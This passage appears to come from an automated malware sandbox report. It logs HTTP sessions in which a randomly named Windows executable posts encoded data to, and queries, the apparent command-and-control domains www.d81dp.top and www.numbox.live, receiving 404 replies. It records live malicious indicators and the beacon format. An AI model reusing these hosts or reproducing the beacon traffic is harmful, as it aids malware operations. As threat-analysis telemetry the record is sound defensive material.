25	192.168.11.20	49843	154.23.184.194	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:20.408284903 CEST	786	OUT	POST /9m01/ HTTP/1.1 Host: www.d81dp.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.d81dp.top Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.d81dp.top/9m01/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 56 52 73 48 4d 68 32 75 2f 74 33 65 74 71 35 2b 4c 5a 43 4f 58 74 35 30 38 56 69 54 44 34 41 6e 36 50 72 48 6a 43 33 53 58 53 48 71 51 37 5a 4f 6c 57 4e 30 35 39 58 38 6e 39 30 68 35 59 68 6c 5a 43 54 4e 32 77 54 74 44 4a 61 71 76 34 72 37 42 79 77 4f 4c 5a 69 53 6e 34 63 65 6f 31 33 4b 4e 79 31 75 43 44 61 54 78 44 57 4c 36 7a 66 67 47 6c 77 4d 74 31 31 35 67 73 65 35 51 68 75 57 53 41 2f 59 4a 51 4f 4c 39 30 44 34 67 6d 58 64 6b 64 41 4d 55 7a 65 6b 6a 6d 6c 57 4f 6d 41 71 53 31 41 4d 6b 41 51 45 41 44 70 4b 36 4c 74 51 75 7a 73 75 4c 6e 6b 66 70 33 54 74 78 76 70 63 35 77 3d 3d Data Ascii: ATk=VRsHMh2u/t3etq5+LZCOXt508ViTD4An6PrHjC3SXSHqQ7ZOlWN059X8n90h5YhlZCTN2wTtDJaqv4r7BywOLZiSn4ceo13KNy1uCDaTxDWL6zfgGlwMt115gse5QhuWSA/YJQOL90D4gmXdkdAMUzekjmlWOmAqS1AMkAQEADpK6LtQuzsuLnkfp3Ttxvpc5w==
Oct 11, 2024 10:02:20.703149080 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:02:20 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66938482-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.11.20	49844	154.23.184.194	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:23.237075090 CEST	806	OUT	POST /9m01/ HTTP/1.1 Host: www.d81dp.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.d81dp.top Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.d81dp.top/9m01/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 56 52 73 48 4d 68 32 75 2f 74 33 65 38 36 70 2b 59 6f 43 4f 53 4e 35 33 32 31 69 54 52 34 41 6a 36 50 33 48 6a 44 7a 43 58 6b 76 71 58 61 70 4f 30 6e 4e 30 31 64 58 38 6f 64 30 67 30 34 68 2b 5a 43 66 7a 32 31 37 74 44 4a 4f 71 76 34 62 37 42 6c 4d 4a 4e 5a 69 71 38 6f 63 63 31 6c 33 4b 4e 79 31 75 43 44 66 4f 78 48 43 4c 39 41 48 67 45 45 77 4c 32 56 31 2b 6a 73 65 35 44 78 75 4b 53 41 2b 6f 4a 53 71 6c 39 33 37 34 67 6b 66 64 6b 73 41 4c 64 7a 65 6d 73 47 6b 37 4e 56 39 61 4a 47 49 49 31 6e 4d 4d 59 52 35 69 32 39 38 4b 7a 42 59 4b 49 30 34 74 74 48 71 46 7a 74 6f 48 6b 31 2f 69 68 42 4d 5a 5a 44 30 34 6e 4d 7a 64 58 70 51 35 75 35 49 3d Data Ascii: ATk=VRsHMh2u/t3e86p+YoCOSN5321iTR4Aj6P3HjDzCXkvqXapO0nN01dX8od0g04h+ZCfz217tDJOqv4b7BlMJNZiq8occ1l3KNy1uCDfOxHCL9AHgEEwL2V1+jse5DxuKSA+oJSql9374gkfdksALdzemsGk7NV9aJGII1nMMYR5i298KzBYKI04ttHqFztoHk1/ihBMZZD04nMzdXpQ5u5I=
Oct 11, 2024 10:02:23.531918049 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:02:23 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66938482-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.11.20	49845	154.23.184.194	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:26.062926054 CEST	2578	OUT	POST /9m01/ HTTP/1.1 Host: www.d81dp.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.d81dp.top Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.d81dp.top/9m01/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 56 52 73 48 4d 68 32 75 2f 74 33 65 38 36 70 2b 59 6f 43 4f 53 4e 35 33 32 31 69 54 52 34 41 6a 36 50 33 48 6a 44 7a 43 58 6b 6e 71 58 6f 68 4f 6d 31 6c 30 30 64 58 38 6c 39 30 6c 30 34 67 6b 5a 43 47 30 32 31 2f 58 44 4b 32 71 70 72 54 37 56 45 4d 4a 59 70 69 71 6a 34 63 64 6f 31 32 51 4e 79 46 71 43 44 50 4f 78 48 43 4c 39 47 44 67 44 56 77 4c 78 6c 31 35 67 73 65 6c 51 68 75 75 53 41 6e 51 4a 53 2b 62 36 48 62 34 67 45 50 64 33 36 55 4c 46 6a 65 67 70 47 6b 6a 4e 56 78 46 4a 47 6c 78 31 6a 4e 5a 59 53 5a 69 6e 35 42 49 75 53 5a 53 4c 46 30 42 6c 30 4b 39 7a 73 38 37 37 6d 50 6e 68 53 34 4c 65 44 6b 54 35 75 6a 4e 44 36 49 4a 78 50 2f 51 6b 6a 39 46 48 30 47 4d 61 63 73 37 51 66 61 5a 63 5a 78 5a 4d 66 39 73 6d 73 67 55 61 65 47 49 7a 4b 45 4b 76 36 32 52 4f 4f 61 51 6c 45 59 4e 55 74 42 6f 35 4a 75 73 4a 53 66 33 79 74 38 79 72 4a 43 64 33 6d 4b 49 43 72 6a 37 58 5a 71 49 6d 7a 34 67 59 6a 45 43 69 6d 72 41 36 55 43 55 62 54 55 47 34 53 49 76 35 34 52 47 4f 79 55 52 74 4d 72 44 43 43 [TRUNCATED] Data Ascii: ATk=VRsHMh2u/t3e86p+YoCOSN5321iTR4Aj6P3HjDzCXknqXohOm1l00dX8l90l04gkZCG021/XDK2qprT7VEMJYpiqj4cdo12QNyFqCDPOxHCL9GDgDVwLxl15gselQhuuSAnQJS+b6Hb4gEPd36ULFjegpGkjNVxFJGlx1jNZYSZin5BIuSZSLF0Bl0K9zs877mPnhS4LeDkT5ujND6IJxP/Qkj9FH0GMacs7QfaZcZxZMf9smsgUaeGIzKEKv62ROOaQlEYNUtBo5JusJSf3yt8yrJCd3mKICrj7XZqImz4gYjECimrA6UCUbTUG4SIv54RGOyURtMrDCCZ5tvtg79DOJN3KXzgUiom/1RqY5XFT08hXmQgL5Ki950/Qjn+vvBucbKwT/gwk3Pv3Pef6OaZR+nFfMOsKHqu8HJgVVfSeXp1VB3lC3tTx5YQHKSSIbnjhpJuhwk9Imq36T6graojkSPq+Uk3ybUSi6jBXdvinvKI4fmZNNGjeq2VB2+MI/MrDQYnLe4UWpxRswylQYp3ogbPwG/XDXjcFcbMGeX/8A+PVuMnb68yNogzPVATWvWXAMu9aRSUfNu1iDlxKayRNp0NMBpFDQQ3qIU/aZh3HS3maktVEbwV4bcgDJNZ/cEps+U++5fDaFX3SC0ZCp2TwCNnHHLGIx46+cueGwYNfUdk7psxVOEI6WjiYoxV0cyZft+i+lfMP7SeBsQWAlgNWlulcPfelqZdxvkJxuZl9PQ5LVztE0ixePsIUyuufwCaDWLx8tn5yAwLYgnbo8dwnBltrne5o+pX6DLWDfNaiilOygDqnv8AVjzTi0SDPSOjBwh1FV8WI3qpp3j4QeJFBjyamRddk4ak31XwutiOnKv2qJ/NsVpkL2K+8lI63RLO7/1O43JApDjS6KTWtsYg6fHnP4fUWKfXLvu2gAhUiVD3aBxTNFqmU50VipUIArgtfjyUvB2e2lV+70rUUV/j+LFhQMn9okmjbCZqtRDbiwOO5 [TRUNCATED]
Oct 11, 2024 10:02:26.062948942 CEST	3867	OUT	Data Raw: 6e 59 38 50 70 36 78 6c 68 32 6c 79 6c 56 34 64 53 38 79 35 33 4d 36 33 50 41 35 48 65 4d 4b 78 43 38 51 73 69 4b 52 68 79 44 6a 41 47 50 7a 2b 53 61 4b 5a 68 69 72 30 42 4b 73 68 4a 33 78 6e 62 4f 6b 4f 4d 57 57 67 42 54 57 63 2b 49 56 64 6e 5a Data Ascii: nY8Pp6xlh2lylV4dS8y53M63PA5HeMKxC8QsiKRhyDjAGPz+SaKZhir0BKshJ3xnbOkOMWWgBTWc+IVdnZH+xqoCa1UNHTAnLvBp3qEMqFoSxeP79C+AYWO6zYHVqprc42DUP4mG/IUkq6j0XcSCbKAFkodkeET6gkjzLK3x+5aklQrLZCMv+cFC4zR+INFIm7e17W+nMjQOX/8odv2jhuWDG4PGiHi8ea3iGQmNJEIQVVYvZnE
Oct 11, 2024 10:02:26.063028097 CEST	1510	OUT	Data Raw: 38 4f 4a 79 6e 76 4f 36 46 41 4e 75 30 52 6b 48 41 65 78 5a 35 70 4b 63 4d 38 77 34 72 54 2b 49 70 6b 6b 31 50 7a 30 4f 6f 66 44 63 64 34 2f 2b 6d 66 78 62 64 4b 78 30 51 56 59 75 6f 37 71 73 73 58 58 45 44 4f 64 79 4d 66 38 61 6e 35 58 6b 74 37 Data Ascii: 8OJynvO6FANu0RkHAexZ5pKcM8w4rT+Ipkk1Pz0OofDcd4/+mfxbdKx0QVYuo7qssXXEDOdyMf8an5Xkt7GI0YqJB9wt0SEEE/5/6ZR2pGXMRBNyZSC4/qeAnpIte3CGf21ON96WVqzg8IBGgpOmQJooBAKtFrhAx4l1UQDwwi3Qk2utYzTyQ+h4d+tu/m490y1fPpyJQlNLto7JcJbrWDl7yQZYxuqa71NgvMDuqWj3YXiPboF
Oct 11, 2024 10:02:26.358563900 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:02:26 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66938482-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.11.20	49846	154.23.184.194	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:28.888482094 CEST	537	OUT	GET /9m01/?ATk=YTEnPXeuvLCqp8pRYpXUCZpIg36YHpIu3aiFszfHZiHCethv0UoX0rLDgO0m0L5Zay3qgh7+EeCD2cfEa0kxUJqZj+V+1gWSSyE2BB2v0BjXvCGVFHNVoHA=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.d81dp.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:02:29.183487892 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:02:29 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66938482-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.11.20	49847	63.250.47.57	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:34.467709064 CEST	792	OUT	POST /q7ah/ HTTP/1.1 Host: www.numbox.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.numbox.live Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.numbox.live/q7ah/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 2f 53 7a 56 50 53 77 56 65 4e 76 72 33 79 50 55 55 6e 49 53 34 58 69 69 49 7a 69 45 49 4a 4b 78 52 61 49 6b 7a 38 62 69 79 38 4a 33 36 48 5a 63 2b 30 46 6e 73 33 43 69 46 68 67 74 78 6b 66 6a 4a 75 51 52 6e 64 73 66 61 4e 6c 51 65 44 6d 6a 31 6e 4d 4c 74 37 79 67 71 6b 52 56 48 41 51 67 71 75 79 66 4e 47 73 7a 5a 5a 77 4b 4b 79 65 76 52 71 2f 38 78 6d 34 38 2b 45 79 54 38 34 56 47 56 4b 35 73 2f 30 59 62 4f 37 38 4c 32 6b 43 55 62 58 34 74 61 71 43 2b 5a 78 7a 6e 37 6b 52 4b 6e 32 79 67 6e 4c 48 74 6a 76 54 65 30 2b 45 51 77 73 46 56 4f 41 32 43 5a 66 59 52 71 69 2b 54 33 77 3d 3d Data Ascii: ATk=/SzVPSwVeNvr3yPUUnIS4XiiIziEIJKxRaIkz8biy8J36HZc+0Fns3CiFhgtxkfjJuQRndsfaNlQeDmj1nMLt7ygqkRVHAQgquyfNGszZZwKKyevRq/8xm48+EyT84VGVK5s/0YbO78L2kCUbX4taqC+Zxzn7kRKn2ygnLHtjvTe0+EQwsFVOA2CZfYRqi+T3w==
Oct 11, 2024 10:02:34.653064966 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 11 Oct 2024 08:02:34 GMT Server: Apache Content-Length: 4395 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester \| 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
Oct 11, 2024 10:02:34.653182030 CEST	1289	IN	Data Raw: 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 Data Ascii: f lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css
Oct 11, 2024 10:02:34.653211117 CEST	1289	IN	Data Raw: 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 72 6f 63 65 73 73 20 30 32 3c 2f Data Ascii: ><a href="#">Process 01</a></li> <li><a href="#">Process 02</a></li> <li><a href="#">Process 03</a></li> </ul> </li> <li><a href="contact.html">Cont
Oct 11, 2024 10:02:34.653223038 CEST	673	IN	Data Raw: 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 Data Ascii: form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a class="icon-1" href

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.11.20	49848	63.250.47.57	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:37.160213947 CEST	812	OUT	POST /q7ah/ HTTP/1.1 Host: www.numbox.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.numbox.live Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.numbox.live/q7ah/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 2f 53 7a 56 50 53 77 56 65 4e 76 72 32 53 2f 55 57 47 49 53 2b 33 69 74 46 6a 69 45 42 70 4b 31 52 61 30 6b 7a 39 66 79 79 75 74 33 36 6a 64 63 2f 32 74 6e 69 58 43 69 4b 42 67 6f 38 45 66 6f 4a 75 4d 5a 6e 59 55 66 61 4c 4a 51 65 44 32 6a 31 55 6b 4b 73 72 79 69 6d 45 52 58 44 41 51 67 71 75 79 66 4e 47 34 56 5a 59 59 4b 4b 48 57 76 41 37 2f 6a 79 6d 34 2f 75 6b 79 54 34 34 56 43 56 4b 35 65 2f 77 5a 4d 4f 34 55 4c 32 68 47 55 62 46 41 69 52 71 43 38 64 78 79 4a 2f 52 6b 6f 70 69 57 64 32 63 7a 66 37 2b 54 2b 38 49 56 4b 74 65 78 78 4e 54 71 77 64 76 68 35 6f 67 2f 49 71 34 54 46 4c 31 62 6d 36 7a 71 48 59 66 4d 6b 78 63 54 74 46 62 51 3d Data Ascii: ATk=/SzVPSwVeNvr2S/UWGIS+3itFjiEBpK1Ra0kz9fyyut36jdc/2tniXCiKBgo8EfoJuMZnYUfaLJQeD2j1UkKsryimERXDAQgquyfNG4VZYYKKHWvA7/jym4/ukyT44VCVK5e/wZMO4UL2hGUbFAiRqC8dxyJ/RkopiWd2czf7+T+8IVKtexxNTqwdvh5og/Iq4TFL1bm6zqHYfMkxcTtFbQ=
Oct 11, 2024 10:02:37.332559109 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 11 Oct 2024 08:02:37 GMT Server: Apache Content-Length: 4395 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester \| 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
Oct 11, 2024 10:02:37.332659960 CEST	1289	IN	Data Raw: 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 Data Ascii: f lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css
Oct 11, 2024 10:02:37.332710028 CEST	1289	IN	Data Raw: 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 72 6f 63 65 73 73 20 30 32 3c 2f Data Ascii: ><a href="#">Process 01</a></li> <li><a href="#">Process 02</a></li> <li><a href="#">Process 03</a></li> </ul> </li> <li><a href="contact.html">Cont
Oct 11, 2024 10:02:37.332768917 CEST	673	IN	Data Raw: 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 Data Ascii: form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a class="icon-1" href

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
